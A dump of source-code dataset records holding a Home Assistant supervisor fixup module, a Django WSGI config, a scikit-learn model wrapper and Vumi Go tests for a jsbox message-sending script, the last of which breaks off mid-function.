] | null | null | null | supervisor/resolution/fixup.py | wschoot/supervisor | 58f803cc9bf27f7f8873cb7667b687b839fd2d2a | [
"Apache-2.0"
] | 200 | 2020-10-13T06:35:51.000Z | 2022-03-31T06:03:35.000Z | supervisor/resolution/fixup.py | sanyatuning/supervisor | 34f64b0ed00ccb4fcd4a60f903f7c8934c553a1c | [
"Apache-2.0"
] | null | null | null | """Helpers to fixup the system."""
import logging
from typing import List
from ..coresys import CoreSys, CoreSysAttributes
from ..jobs.const import JobCondition
from ..jobs.decorator import Job
from .data import Suggestion
from .fixups.base import FixupBase
from .fixups.clear_full_snapshot import FixupClearFullSnapshot
from .fixups.create_full_snapshot import FixupCreateFullSnapshot
from .fixups.store_execute_reload import FixupStoreExecuteReload
from .fixups.store_execute_remove import FixupStoreExecuteRemove
from .fixups.store_execute_reset import FixupStoreExecuteReset
_LOGGER: logging.Logger = logging.getLogger(__name__)
class ResolutionFixup(CoreSysAttributes):
"""Suggestion class for resolution."""
def __init__(self, coresys: CoreSys) -> None:
"""Initialize the suggestion class."""
self.coresys = coresys
self._create_full_snapshot = FixupCreateFullSnapshot(coresys)
self._clear_full_snapshot = FixupClearFullSnapshot(coresys)
self._store_execute_reset = FixupStoreExecuteReset(coresys)
self._store_execute_reload = FixupStoreExecuteReload(coresys)
self._store_execute_remove = FixupStoreExecuteRemove(coresys)
@property
def all_fixes(self) -> List[FixupBase]:
"""Return a list of all fixups.
Order can be important!
"""
return [
self._create_full_snapshot,
self._clear_full_snapshot,
self._store_execute_reload,
self._store_execute_reset,
self._store_execute_remove,
]
@Job(conditions=[JobCondition.HEALTHY])
async def run_autofix(self) -> None:
"""Run all startup fixes."""
_LOGGER.info("Starting system autofix at state %s", self.sys_core.state)
for fix in self.all_fixes:
if not fix.auto:
continue
try:
await fix()
except Exception as err: # pylint: disable=broad-except
_LOGGER.warning("Error during processing %s: %s", fix.suggestion, err)
self.sys_capture_exception(err)
_LOGGER.info("System autofix complete")
async def apply_fixup(self, suggestion: Suggestion) -> None:
"""Apply a fixup for a suggestion."""
for fix in self.all_fixes:
if fix.suggestion != suggestion.type or fix.context != suggestion.context:
continue
await fix()
| 35.911765 | 86 | 0.685504 | import logging
from typing import List
from ..coresys import CoreSys, CoreSysAttributes
from ..jobs.const import JobCondition
from ..jobs.decorator import Job
from .data import Suggestion
from .fixups.base import FixupBase
from .fixups.clear_full_snapshot import FixupClearFullSnapshot
from .fixups.create_full_snapshot import FixupCreateFullSnapshot
from .fixups.store_execute_reload import FixupStoreExecuteReload
from .fixups.store_execute_remove import FixupStoreExecuteRemove
from .fixups.store_execute_reset import FixupStoreExecuteReset
_LOGGER: logging.Logger = logging.getLogger(__name__)
class ResolutionFixup(CoreSysAttributes):
def __init__(self, coresys: CoreSys) -> None:
self.coresys = coresys
self._create_full_snapshot = FixupCreateFullSnapshot(coresys)
self._clear_full_snapshot = FixupClearFullSnapshot(coresys)
self._store_execute_reset = FixupStoreExecuteReset(coresys)
self._store_execute_reload = FixupStoreExecuteReload(coresys)
self._store_execute_remove = FixupStoreExecuteRemove(coresys)
@property
def all_fixes(self) -> List[FixupBase]:
return [
self._create_full_snapshot,
self._clear_full_snapshot,
self._store_execute_reload,
self._store_execute_reset,
self._store_execute_remove,
]
@Job(conditions=[JobCondition.HEALTHY])
async def run_autofix(self) -> None:
_LOGGER.info("Starting system autofix at state %s", self.sys_core.state)
for fix in self.all_fixes:
if not fix.auto:
continue
try:
await fix()
except Exception as err:
_LOGGER.warning("Error during processing %s: %s", fix.suggestion, err)
self.sys_capture_exception(err)
_LOGGER.info("System autofix complete")
async def apply_fixup(self, suggestion: Suggestion) -> None:
for fix in self.all_fixes:
if fix.suggestion != suggestion.type or fix.context != suggestion.context:
continue
await fix()
| true | true |
1c3c9412efdc3bd4cb9ab2242cb6c81707718094 | 415 | py | Python | backend/long_darkness_29195/wsgi.py | crowdbotics-apps/long-darkness-29195 | 98f34a3ee9a7656f19a26b7c865e5de78839518c | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/long_darkness_29195/wsgi.py | crowdbotics-apps/long-darkness-29195 | 98f34a3ee9a7656f19a26b7c865e5de78839518c | [
"FTL",
"AML",
"RSA-MD"
] | 49 | 2021-07-26T17:04:51.000Z | 2021-07-26T17:07:44.000Z | backend/long_darkness_29195/wsgi.py | crowdbotics-apps/long-darkness-29195 | 98f34a3ee9a7656f19a26b7c865e5de78839518c | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | """
WSGI config for long_darkness_29195 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'long_darkness_29195.settings')
application = get_wsgi_application()
| 24.411765 | 79 | 0.79759 |
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'long_darkness_29195.settings')
application = get_wsgi_application()
| true | true |
1c3c943c63d83e4a71845752358be989ec75ad82 | 2,513 | py | Python | api/ml/model.py | ghacupha/fastapi-ml-quickstart | 866068eb2b2ea7f08003947e80f57bdacb24db81 | [
"MIT"
] | null | null | null | api/ml/model.py | ghacupha/fastapi-ml-quickstart | 866068eb2b2ea7f08003947e80f57bdacb24db81 | [
"MIT"
] | null | null | null | api/ml/model.py | ghacupha/fastapi-ml-quickstart | 866068eb2b2ea7f08003947e80f57bdacb24db81 | [
"MIT"
] | null | null | null | import joblib
import numpy as np
from pathlib import Path
from sklearn.ensemble import RandomForestRegressor
from sklearn.datasets import load_boston
class Model:
"""
Models Definition.
This is a general representation of what we do with a model that we are serving, henceforth
applied as the matrix throughout the application
"""
def __init__(self, model_path: str = None):
self._model = None
self._model_path = model_path
self.load()
def train(self, X: np.ndarray, y: np.ndarray):
"""
Model definition and training.
This method creates a model using the underlying library implementation, the data
provided in the feature matrix X, is related to the data in the matrix y
"""
self._model = RandomForestRegressor()
self._model.fit(X, y)
return self
def predict(self, X: np.ndarray) -> np.ndarray:
"""
Prediction logic.
Returns array with predictions corresponding to the input matrix X
"""
return self._model.predict(X)
def save(self):
"""
Model persistence to the file system.
This method saves the model to the path provided when creating the model object; internally the
implementation uses joblib
"""
if self._model is not None:
joblib.dump(self._model, self._model_path)
else:
raise TypeError("The model is not trained yet, use .train() before saving")
def load(self):
"""
Load model from file system.
This method creates the persistent, trained model as saved in the file system using joblib. It is
important for consistency to use the same version of joblib when saving the model and when loading it
"""
try:
self._model = joblib.load(self._model_path)
except:
self._model = None
return self
model_path = Path(__file__).parent / "model.joblib"
n_features = load_boston(return_X_y=True)[0].shape[1]
model = Model(model_path)
def get_model():
"""
Model singleton.
This function returns the model to be used through out the application. The model is already
configured and trained and is ready for use in prediction. The same is loaded from the file
system model.joblib file
"""
return model
if __name__ == "__main__":
X, y = load_boston(return_X_y=True)
model.train(X, y)
model.save()
| 28.556818 | 109 | 0.645444 | import joblib
import numpy as np
from pathlib import Path
from sklearn.ensemble import RandomForestRegressor
from sklearn.datasets import load_boston
class Model:
def __init__(self, model_path: str = None):
self._model = None
self._model_path = model_path
self.load()
def train(self, X: np.ndarray, y: np.ndarray):
self._model = RandomForestRegressor()
self._model.fit(X, y)
return self
def predict(self, X: np.ndarray) -> np.ndarray:
return self._model.predict(X)
def save(self):
if self._model is not None:
joblib.dump(self._model, self._model_path)
else:
raise TypeError("The model is not trained yet, use .train() before saving")
def load(self):
try:
self._model = joblib.load(self._model_path)
except:
self._model = None
return self
model_path = Path(__file__).parent / "model.joblib"
n_features = load_boston(return_X_y=True)[0].shape[1]
model = Model(model_path)
def get_model():
return model
if __name__ == "__main__":
X, y = load_boston(return_X_y=True)
model.train(X, y)
model.save()
| true | true |
1c3c94f3fa15114d5deef225333bf840a40813b0 | 13,896 | py | Python | go/scripts/tests/test_jsbox_send.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | go/scripts/tests/test_jsbox_send.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | go/scripts/tests/test_jsbox_send.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | import json
from StringIO import StringIO
from tempfile import NamedTemporaryFile
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.internet.task import Clock
from twisted.python import usage
from vumi.tests.helpers import VumiTestCase
from go.scripts.jsbox_send import (
JsBoxSendWorker, JsBoxSendOptions, ScriptError, Ticker)
from go.vumitools.tests.helpers import VumiApiHelper, GoMessageHelper
class TestJsBoxSendOptions(VumiTestCase):
DEFAULT_ARGS = (
"--vumigo-config", "default.yaml",
"--user-account-key", "user-123",
"--conversation-key", "conv-456",
)
def mk_opts(self, args, add_defaults=True):
args.extend(self.DEFAULT_ARGS)
opts = JsBoxSendOptions()
opts.parseOptions(args)
return opts
def test_hz_default(self):
opts = self.mk_opts([])
self.assertEqual(opts['hz'], 60.0)
def test_hz_override(self):
opts = self.mk_opts(["--hz", '10.0'])
self.assertEqual(opts['hz'], 10.0)
def test_hz_negative_or_zero(self):
self.assertRaises(
usage.UsageError,
self.mk_opts, ["--hz", "-5.0"])
def test_hz_not_numeric(self):
self.assertRaises(
usage.UsageError,
self.mk_opts, ["--hz", "foo"])
class TestTicker(VumiTestCase):
def setUp(self):
self.override_ticker_clock()
def override_ticker_clock(self):
orig_clock = Ticker.clock
def restore_clock():
Ticker.clock = orig_clock
Ticker.clock = Clock()
self.add_cleanup(restore_clock)
def test_first_tick(self):
t = Ticker(hz=1)
d1 = t.tick()
self.assertFalse(d1.called)
t.clock.advance(0)
self.assertTrue(d1.called)
def test_fast(self):
t = Ticker(hz=1)
t.tick()
t.clock.advance(0.1)
d = t.tick()
self.assertFalse(d.called)
t.clock.advance(0.5)
self.assertFalse(d.called)
t.clock.advance(0.5)
self.assertTrue(d.called)
def test_slow(self):
t = Ticker(hz=1)
t.tick()
t.clock.advance(1.5)
d = t.tick()
self.assertFalse(d.called)
t.clock.advance(0)
self.assertTrue(d.called)
class TestJsBoxSend(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.vumi_helper = yield self.add_helper(VumiApiHelper())
self.user_helper = yield self.vumi_helper.get_or_create_user()
self.msg_helper = yield self.add_helper(
GoMessageHelper(self.vumi_helper))
@inlineCallbacks
def get_worker(self):
vumigo_config = self.vumi_helper.mk_config({})
worker_helper = self.vumi_helper.get_worker_helper()
worker = yield worker_helper.get_worker(JsBoxSendWorker, vumigo_config)
worker.stdout = StringIO()
returnValue(worker)
@inlineCallbacks
def test_get_conversation_jsbox(self):
conv = yield self.user_helper.create_conversation(u'jsbox')
worker = yield self.get_worker()
loaded_conv = yield worker.get_conversation(
self.user_helper.account_key, conv.key)
self.assertEqual(conv.key, loaded_conv.key)
@inlineCallbacks
def test_get_conversation_dialogue(self):
conv = yield self.user_helper.create_conversation(u'dialogue')
worker = yield self.get_worker()
loaded_conv = yield worker.get_conversation(
self.user_helper.account_key, conv.key)
self.assertEqual(conv.key, loaded_conv.key)
@inlineCallbacks
def test_get_conversation_unsupported_type(self):
conv = yield self.user_helper.create_conversation(u'bulk_send')
worker = yield self.get_worker()
failure = yield self.assertFailure(worker.get_conversation(
self.user_helper.account_key, conv.key), ScriptError)
self.assertEqual(
str(failure), "Unsupported conversation type: bulk_send")
@inlineCallbacks
def test_get_delivery_class_jsbox(self):
conv = yield self.user_helper.create_conversation(
u'jsbox',
config={
'jsbox_app_config': {
'config': {
'key': 'config',
'value': json.dumps({
'delivery_class': 'twitter',
})
},
},
})
worker = yield self.get_worker()
self.assertEqual(worker.get_delivery_class(conv), 'twitter')
@inlineCallbacks
def test_get_delivery_class_dialogue(self):
conv = yield self.user_helper.create_conversation(
u'dialogue',
config={
'poll': {
'poll_metadata': {
'delivery_class': 'mxit',
},
},
})
worker = yield self.get_worker()
self.assertEqual(worker.get_delivery_class(conv), 'mxit')
@inlineCallbacks
def test_get_conversation_missing(self):
worker = yield self.get_worker()
failure = yield self.assertFailure(worker.get_conversation(
self.user_helper.account_key, u'badkey'), ScriptError)
self.assertEqual(str(failure), "Conversation not found: badkey")
@inlineCallbacks
def test_send_to_conv_jsbox(self):
conv = yield self.user_helper.create_conversation(u'jsbox')
worker = yield self.get_worker()
worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
msg = self.msg_helper.make_inbound('foo')
self.assertEqual(worker_helper.get_dispatched_inbound(), [])
worker.send_to_conv(conv, msg)
self.assertEqual(worker_helper.get_dispatched_inbound(), [msg])
@inlineCallbacks
def test_send_to_conv_dialogue(self):
conv = yield self.user_helper.create_conversation(u'dialogue')
worker = yield self.get_worker()
worker_helper = self.vumi_helper.get_worker_helper(
'dialogue_transport')
msg = self.msg_helper.make_inbound('foo')
self.assertEqual(worker_helper.get_dispatched_inbound(), [])
worker.send_to_conv(conv, msg)
self.assertEqual(worker_helper.get_dispatched_inbound(), [msg])
@inlineCallbacks
def test_send_inbound_push_trigger(self):
conv = yield self.user_helper.create_conversation(u'jsbox')
worker = yield self.get_worker()
worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
self.assertEqual(worker_helper.get_dispatched_inbound(), [])
self.assertEqual(worker.stdout.getvalue(), '')
yield worker.send_inbound_push_trigger('+27831234567', conv)
self.assertEqual(
worker.stdout.getvalue(),
"Starting u'My Conversation' [%s] -> +27831234567\n" % (conv.key,))
[msg] = worker_helper.get_dispatched_inbound()
self.assertEqual(msg['inbound_push_trigger'], True)
self.assertEqual(msg['from_addr'], '+27831234567')
@inlineCallbacks
def test_get_excluded_addrs_no_file(self):
worker = yield self.get_worker()
excluded_addrs = worker.get_excluded_addrs(None)
self.assertEqual(excluded_addrs, set())
@inlineCallbacks
def test_get_excluded_addrs_simple(self):
exclude_file = NamedTemporaryFile()
exclude_file.write('addr1\naddr2')
exclude_file.flush()
worker = yield self.get_worker()
excluded_addrs = worker.get_excluded_addrs(exclude_file.name)
self.assertEqual(excluded_addrs, set(['addr1', 'addr2']))
@inlineCallbacks
def test_get_excluded_addrs_messy(self):
exclude_file = NamedTemporaryFile()
exclude_file.write('addr1 \naddr2\n\naddr1\n\taddr3\n')
exclude_file.flush()
worker = yield self.get_worker()
excluded_addrs = worker.get_excluded_addrs(exclude_file.name)
self.assertEqual(excluded_addrs, set(['addr1', 'addr2', 'addr3']))
@inlineCallbacks
def test_get_contacts_for_addrs_no_groups(self):
conv = yield self.user_helper.create_conversation(u'jsbox')
worker = yield self.get_worker()
addrs = yield worker.get_contact_addrs_for_conv(conv, None, set())
self.assertEqual(addrs, [])
self.assertEqual(worker.stdout.getvalue(), '')
@inlineCallbacks
def test_get_contacts_for_addrs_small_group(self):
cs = self.user_helper.user_api.contact_store
grp = yield cs.new_group(u'group')
contacts = [
(yield cs.new_contact(msisdn=u'+01', groups=[grp])),
(yield cs.new_contact(msisdn=u'+02', groups=[grp])),
(yield cs.new_contact(msisdn=u'+03', groups=[grp])),
]
conv = yield self.user_helper.create_conversation(
u'jsbox', groups=[grp])
worker = yield self.get_worker()
addrs = yield worker.get_contact_addrs_for_conv(conv, None, set())
self.assertEqual(
sorted(addrs), sorted([c.msisdn for c in contacts]))
self.assertEqual(worker.stdout.getvalue(), 'Addresses collected: 3\n')
@inlineCallbacks
def test_get_contacts_for_addrs_gtalk(self):
cs = self.user_helper.user_api.contact_store
grp = yield cs.new_group(u'group')
contacts = [
(yield cs.new_contact(msisdn=u'', gtalk_id=u'1@a', groups=[grp])),
(yield cs.new_contact(msisdn=u'', gtalk_id=u'2@a', groups=[grp])),
(yield cs.new_contact(msisdn=u'', gtalk_id=u'3@a', groups=[grp])),
]
conv = yield self.user_helper.create_conversation(
u'jsbox', groups=[grp])
worker = yield self.get_worker()
addrs = yield worker.get_contact_addrs_for_conv(conv, 'gtalk', set())
self.assertEqual(sorted(addrs), sorted([c.gtalk_id for c in contacts]))
@inlineCallbacks
def test_get_contacts_for_addrs_exclude_list(self):
cs = self.user_helper.user_api.contact_store
grp = yield cs.new_group(u'group')
yield cs.new_contact(msisdn=u'+01', groups=[grp])
yield cs.new_contact(msisdn=u'+02', groups=[grp])
yield cs.new_contact(msisdn=u'+03', groups=[grp])
conv = yield self.user_helper.create_conversation(
u'jsbox', groups=[grp])
worker = yield self.get_worker()
excluded = set(['+02', '+04'])
addrs = yield worker.get_contact_addrs_for_conv(conv, None, excluded)
self.assertEqual(sorted(addrs), ['+01', '+03'])
self.assertEqual(worker.stdout.getvalue(), 'Addresses collected: 2\n')
@inlineCallbacks
def test_send_jsbox_default_delivery_class(self):
cs = self.user_helper.user_api.contact_store
grp = yield cs.new_group(u'group')
contacts = [
(yield cs.new_contact(msisdn=u'+01', groups=[grp])),
(yield cs.new_contact(msisdn=u'+02', groups=[grp])),
(yield cs.new_contact(msisdn=u'+03', groups=[grp])),
]
conv = yield self.user_helper.create_conversation(
u'jsbox', groups=[grp])
worker = yield self.get_worker()
worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
self.assertEqual(worker_helper.get_dispatched_inbound(), [])
yield worker.send_jsbox(self.user_helper.account_key, conv.key)
msgs = worker_helper.get_dispatched_inbound()
msg_addrs = sorted(msg['from_addr'] for msg in msgs)
self.assertEqual(msg_addrs, [c.msisdn for c in contacts])
self.assertTrue(all(msg['inbound_push_trigger'] for msg in msgs))
@inlineCallbacks
def test_send_jsbox_gtalk(self):
cs = self.user_helper.user_api.contact_store
grp = yield cs.new_group(u'group')
contacts = [
(yield cs.new_contact(msisdn=u'', gtalk_id=u'1@a', groups=[grp])),
(yield cs.new_contact(msisdn=u'', gtalk_id=u'2@a', groups=[grp])),
(yield cs.new_contact(msisdn=u'', gtalk_id=u'3@a', groups=[grp])),
]
conv = yield self.user_helper.create_conversation(
u'jsbox', groups=[grp], config={'jsbox_app_config': {'config': {
'key': 'config',
'value': json.dumps({'delivery_class': 'gtalk'}),
}}})
worker = yield self.get_worker()
worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
self.assertEqual(worker_helper.get_dispatched_inbound(), [])
yield worker.send_jsbox(self.user_helper.account_key, conv.key)
msgs = worker_helper.get_dispatched_inbound()
msg_addrs = sorted(msg['from_addr'] for msg in msgs)
self.assertEqual(msg_addrs, [c.gtalk_id for c in contacts])
self.assertTrue(all(msg['inbound_push_trigger'] for msg in msgs))
@inlineCallbacks
def test_send_jsbox_big_group(self):
conv = yield self.user_helper.create_conversation(u'jsbox')
worker = yield self.get_worker()
def generate_contact_addrs(conv, delivery_class, excluded_addrs):
return ['+27831234%03s' % i for i in xrange(1000)]
worker.get_contact_addrs_for_conv = generate_contact_addrs
worker.send_inbound_push_trigger = lambda to_addr, conversation: None
yield worker.send_jsbox(self.user_helper.account_key, conv.key, 1000)
self.assertEqual(worker.stdout.getvalue(), ''.join([
'Messages sent: 100 / 1000\n',
'Messages sent: 200 / 1000\n',
'Messages sent: 300 / 1000\n',
'Messages sent: 400 / 1000\n',
'Messages sent: 500 / 1000\n',
'Messages sent: 600 / 1000\n',
'Messages sent: 700 / 1000\n',
'Messages sent: 800 / 1000\n',
'Messages sent: 900 / 1000\n',
'Messages sent: 1000 / 1000\n',
]))
| 38.38674 | 79 | 0.636874 | import json
from StringIO import StringIO
from tempfile import NamedTemporaryFile
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.internet.task import Clock
from twisted.python import usage
from vumi.tests.helpers import VumiTestCase
from go.scripts.jsbox_send import (
JsBoxSendWorker, JsBoxSendOptions, ScriptError, Ticker)
from go.vumitools.tests.helpers import VumiApiHelper, GoMessageHelper
class TestJsBoxSendOptions(VumiTestCase):
DEFAULT_ARGS = (
"--vumigo-config", "default.yaml",
"--user-account-key", "user-123",
"--conversation-key", "conv-456",
)
def mk_opts(self, args, add_defaults=True):
args.extend(self.DEFAULT_ARGS)
opts = JsBoxSendOptions()
opts.parseOptions(args)
return opts
def test_hz_default(self):
opts = self.mk_opts([])
self.assertEqual(opts['hz'], 60.0)
def test_hz_override(self):
opts = self.mk_opts(["--hz", '10.0'])
self.assertEqual(opts['hz'], 10.0)
def test_hz_negative_or_zero(self):
self.assertRaises(
usage.UsageError,
self.mk_opts, ["--hz", "-5.0"])
def test_hz_not_numeric(self):
self.assertRaises(
usage.UsageError,
self.mk_opts, ["--hz", "foo"])
class TestTicker(VumiTestCase):
def setUp(self):
self.override_ticker_clock()
def override_ticker_clock(self):
orig_clock = Ticker.clock
def restore_clock():
Ticker.clock = orig_clock
Ticker.clock = Clock()
self.add_cleanup(restore_clock)
def test_first_tick(self):
t = Ticker(hz=1)
d1 = t.tick()
self.assertFalse(d1.called)
t.clock.advance(0)
self.assertTrue(d1.called)
def test_fast(self):
t = Ticker(hz=1)
t.tick()
t.clock.advance(0.1)
d = t.tick()
self.assertFalse(d.called)
t.clock.advance(0.5)
self.assertFalse(d.called)
t.clock.advance(0.5)
self.assertTrue(d.called)
def test_slow(self):
t = Ticker(hz=1)
t.tick()
t.clock.advance(1.5)
d = t.tick()
self.assertFalse(d.called)
t.clock.advance(0)
self.assertTrue(d.called)
class TestJsBoxSend(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.vumi_helper = yield self.add_helper(VumiApiHelper())
self.user_helper = yield self.vumi_helper.get_or_create_user()
self.msg_helper = yield self.add_helper(
GoMessageHelper(self.vumi_helper))
@inlineCallbacks
def get_worker(self):
vumigo_config = self.vumi_helper.mk_config({})
worker_helper = self.vumi_helper.get_worker_helper()
worker = yield worker_helper.get_worker(JsBoxSendWorker, vumigo_config)
worker.stdout = StringIO()
returnValue(worker)
@inlineCallbacks
def test_get_conversation_jsbox(self):
conv = yield self.user_helper.create_conversation(u'jsbox')
worker = yield self.get_worker()
loaded_conv = yield worker.get_conversation(
self.user_helper.account_key, conv.key)
self.assertEqual(conv.key, loaded_conv.key)
@inlineCallbacks
def test_get_conversation_dialogue(self):
conv = yield self.user_helper.create_conversation(u'dialogue')
worker = yield self.get_worker()
loaded_conv = yield worker.get_conversation(
self.user_helper.account_key, conv.key)
self.assertEqual(conv.key, loaded_conv.key)
@inlineCallbacks
def test_get_conversation_unsupported_type(self):
conv = yield self.user_helper.create_conversation(u'bulk_send')
worker = yield self.get_worker()
failure = yield self.assertFailure(worker.get_conversation(
self.user_helper.account_key, conv.key), ScriptError)
self.assertEqual(
str(failure), "Unsupported conversation type: bulk_send")
@inlineCallbacks
def test_get_delivery_class_jsbox(self):
conv = yield self.user_helper.create_conversation(
u'jsbox',
config={
'jsbox_app_config': {
'config': {
'key': 'config',
'value': json.dumps({
'delivery_class': 'twitter',
})
},
},
})
worker = yield self.get_worker()
self.assertEqual(worker.get_delivery_class(conv), 'twitter')
@inlineCallbacks
def test_get_delivery_class_dialogue(self):
conv = yield self.user_helper.create_conversation(
u'dialogue',
config={
'poll': {
'poll_metadata': {
'delivery_class': 'mxit',
},
},
})
worker = yield self.get_worker()
self.assertEqual(worker.get_delivery_class(conv), 'mxit')
@inlineCallbacks
def test_get_conversation_missing(self):
worker = yield self.get_worker()
failure = yield self.assertFailure(worker.get_conversation(
self.user_helper.account_key, u'badkey'), ScriptError)
self.assertEqual(str(failure), "Conversation not found: badkey")
@inlineCallbacks
def test_send_to_conv_jsbox(self):
conv = yield self.user_helper.create_conversation(u'jsbox')
worker = yield self.get_worker()
worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
msg = self.msg_helper.make_inbound('foo')
self.assertEqual(worker_helper.get_dispatched_inbound(), [])
worker.send_to_conv(conv, msg)
self.assertEqual(worker_helper.get_dispatched_inbound(), [msg])
@inlineCallbacks
def test_send_to_conv_dialogue(self):
conv = yield self.user_helper.create_conversation(u'dialogue')
worker = yield self.get_worker()
worker_helper = self.vumi_helper.get_worker_helper(
'dialogue_transport')
msg = self.msg_helper.make_inbound('foo')
self.assertEqual(worker_helper.get_dispatched_inbound(), [])
worker.send_to_conv(conv, msg)
self.assertEqual(worker_helper.get_dispatched_inbound(), [msg])
@inlineCallbacks
def test_send_inbound_push_trigger(self):
conv = yield self.user_helper.create_conversation(u'jsbox')
worker = yield self.get_worker()
worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
self.assertEqual(worker_helper.get_dispatched_inbound(), [])
self.assertEqual(worker.stdout.getvalue(), '')
yield worker.send_inbound_push_trigger('+27831234567', conv)
self.assertEqual(
worker.stdout.getvalue(),
"Starting u'My Conversation' [%s] -> +27831234567\n" % (conv.key,))
[msg] = worker_helper.get_dispatched_inbound()
self.assertEqual(msg['inbound_push_trigger'], True)
self.assertEqual(msg['from_addr'], '+27831234567')
@inlineCallbacks
def test_get_excluded_addrs_no_file(self):
worker = yield self.get_worker()
excluded_addrs = worker.get_excluded_addrs(None)
self.assertEqual(excluded_addrs, set())
@inlineCallbacks
def test_get_excluded_addrs_simple(self):
exclude_file = NamedTemporaryFile()
exclude_file.write('addr1\naddr2')
exclude_file.flush()
worker = yield self.get_worker()
excluded_addrs = worker.get_excluded_addrs(exclude_file.name)
self.assertEqual(excluded_addrs, set(['addr1', 'addr2']))
@inlineCallbacks
def test_get_excluded_addrs_messy(self):
exclude_file = NamedTemporaryFile()
exclude_file.write('addr1 \naddr2\n\naddr1\n\taddr3\n')
exclude_file.flush()
worker = yield self.get_worker()
excluded_addrs = worker.get_excluded_addrs(exclude_file.name)
self.assertEqual(excluded_addrs, set(['addr1', 'addr2', 'addr3']))
@inlineCallbacks
def test_get_contacts_for_addrs_no_groups(self):
conv = yield self.user_helper.create_conversation(u'jsbox')
worker = yield self.get_worker()
addrs = yield worker.get_contact_addrs_for_conv(conv, None, set())
self.assertEqual(addrs, [])
self.assertEqual(worker.stdout.getvalue(), '')
@inlineCallbacks
def test_get_contacts_for_addrs_small_group(self):
cs = self.user_helper.user_api.contact_store
grp = yield cs.new_group(u'group')
contacts = [
(yield cs.new_contact(msisdn=u'+01', groups=[grp])),
(yield cs.new_contact(msisdn=u'+02', groups=[grp])),
(yield cs.new_contact(msisdn=u'+03', groups=[grp])),
]
conv = yield self.user_helper.create_conversation(
u'jsbox', groups=[grp])
worker = yield self.get_worker()
addrs = yield worker.get_contact_addrs_for_conv(conv, None, set())
self.assertEqual(
sorted(addrs), sorted([c.msisdn for c in contacts]))
self.assertEqual(worker.stdout.getvalue(), 'Addresses collected: 3\n')
@inlineCallbacks
def test_get_contacts_for_addrs_gtalk(self):
cs = self.user_helper.user_api.contact_store
grp = yield cs.new_group(u'group')
contacts = [
(yield cs.new_contact(msisdn=u'', gtalk_id=u'1@a', groups=[grp])),
(yield cs.new_contact(msisdn=u'', gtalk_id=u'2@a', groups=[grp])),
(yield cs.new_contact(msisdn=u'', gtalk_id=u'3@a', groups=[grp])),
]
conv = yield self.user_helper.create_conversation(
u'jsbox', groups=[grp])
worker = yield self.get_worker()
addrs = yield worker.get_contact_addrs_for_conv(conv, 'gtalk', set())
self.assertEqual(sorted(addrs), sorted([c.gtalk_id for c in contacts]))
@inlineCallbacks
def test_get_contacts_for_addrs_exclude_list(self):
cs = self.user_helper.user_api.contact_store
grp = yield cs.new_group(u'group')
yield cs.new_contact(msisdn=u'+01', groups=[grp])
yield cs.new_contact(msisdn=u'+02', groups=[grp])
yield cs.new_contact(msisdn=u'+03', groups=[grp])
conv = yield self.user_helper.create_conversation(
u'jsbox', groups=[grp])
worker = yield self.get_worker()
excluded = set(['+02', '+04'])
addrs = yield worker.get_contact_addrs_for_conv(conv, None, excluded)
self.assertEqual(sorted(addrs), ['+01', '+03'])
self.assertEqual(worker.stdout.getvalue(), 'Addresses collected: 2\n')
@inlineCallbacks
def test_send_jsbox_default_delivery_class(self):
cs = self.user_helper.user_api.contact_store
grp = yield cs.new_group(u'group')
contacts = [
(yield cs.new_contact(msisdn=u'+01', groups=[grp])),
(yield cs.new_contact(msisdn=u'+02', groups=[grp])),
(yield cs.new_contact(msisdn=u'+03', groups=[grp])),
]
conv = yield self.user_helper.create_conversation(
u'jsbox', groups=[grp])
worker = yield self.get_worker()
worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
self.assertEqual(worker_helper.get_dispatched_inbound(), [])
yield worker.send_jsbox(self.user_helper.account_key, conv.key)
msgs = worker_helper.get_dispatched_inbound()
msg_addrs = sorted(msg['from_addr'] for msg in msgs)
self.assertEqual(msg_addrs, [c.msisdn for c in contacts])
self.assertTrue(all(msg['inbound_push_trigger'] for msg in msgs))
@inlineCallbacks
def test_send_jsbox_gtalk(self):
cs = self.user_helper.user_api.contact_store
grp = yield cs.new_group(u'group')
contacts = [
(yield cs.new_contact(msisdn=u'', gtalk_id=u'1@a', groups=[grp])),
(yield cs.new_contact(msisdn=u'', gtalk_id=u'2@a', groups=[grp])),
(yield cs.new_contact(msisdn=u'', gtalk_id=u'3@a', groups=[grp])),
]
conv = yield self.user_helper.create_conversation(
u'jsbox', groups=[grp], config={'jsbox_app_config': {'config': {
'key': 'config',
'value': json.dumps({'delivery_class': 'gtalk'}),
}}})
worker = yield self.get_worker()
worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
self.assertEqual(worker_helper.get_dispatched_inbound(), [])
yield worker.send_jsbox(self.user_helper.account_key, conv.key)
msgs = worker_helper.get_dispatched_inbound()
msg_addrs = sorted(msg['from_addr'] for msg in msgs)
self.assertEqual(msg_addrs, [c.gtalk_id for c in contacts])
self.assertTrue(all(msg['inbound_push_trigger'] for msg in msgs))
@inlineCallbacks
def test_send_jsbox_big_group(self):
conv = yield self.user_helper.create_conversation(u'jsbox')
worker = yield self.get_worker()
def generate_contact_addrs(conv, delivery_class, excluded_addrs):
